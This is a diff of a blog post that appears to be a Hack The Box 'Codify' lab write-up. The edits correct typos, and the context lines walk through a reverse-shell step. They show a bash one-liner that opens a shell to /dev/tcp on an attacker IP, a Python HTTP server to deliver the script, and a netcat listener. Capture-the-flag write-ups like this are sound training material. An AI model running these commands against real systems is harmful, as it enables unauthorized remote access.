rubaiat-hossain/rubaiat-hossain.github.io/_posts/2024-03-23-Pwn-Hack the Box-Codify.md

 bash -c 'bash -i >& /dev/tcp/10.10.14.151//1337 0>&1'
 ```

 Change the IP address to your own tun0 interface IP address.
-You can use the below command to retreive your attack box IP.
+You can use the below command to retrieve your attack box IP.

 ```bash
 ip a | grep tun0
 ```

-Now, fire up a HTTP server on your attack box so that you can deliver this shell script into the target box(Codify).
-You can use the following python one-liner.
+Now, fire up an HTTP server on your attack box so that you can deliver this shell script into the target box(Codify).
+You can use the following Python one-liner.

 ```bash
 python3 -m http.server 9000
 ```

 You can now download the shell script from the target machine using curl.
-However, before we do that, let's create a netcat listener on another terminal so that we can interact with the shell.
+However, before we do that, let's create a `netcat` listener on another terminal so that we can interact with the shell.

 ```bash
 nc -lvnp 1337